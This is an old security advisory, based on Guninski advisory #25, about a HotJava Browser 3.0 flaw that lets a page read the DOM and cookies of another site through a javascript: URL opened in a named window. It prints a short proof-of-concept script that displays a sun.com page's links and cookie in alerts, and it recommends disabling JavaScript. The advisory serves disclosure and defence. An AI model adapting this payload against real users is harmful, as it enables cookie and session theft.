Vulnerability

    javascript

Affected

    HotJava 3.0

Description

    Following is  based on  a Georgi  Guninski security  advisory #25.
    There is  a security  vulnerability in  HotJava Browser  3.0 which
    allows accessing  the DOM  of arbitrary  URLs after  viewing a web
    page.  This allows stealing of cookies.

    The problem is opening an javascript: URL in a named window, which
    allows accessing the DOM of the document in the named window.

    The code is:

        <SCRIPT>
        window.open("http://www.sun.com","g");
        setTimeout("window.open('javascript:alert(\"The first link is:
        \"+document.links[0].href);alert(\"The cookie is:
        \"+document.cookie)','g')",10000);
        </SCRIPT>

    Demonstration is available at:

        http://www.guninski.com/hotjava-1.html

Solution

    Disable  JavaScript.   Sun's  current  plan  is  that  the HotJava
    Browser may not be included in a future Solaris release.  However,
    this plan is subject to change at Sun's sole discretion.

    According to Sun's documents on Solaris8 subject,  The HotJava(TM)
    browser is no longer supported.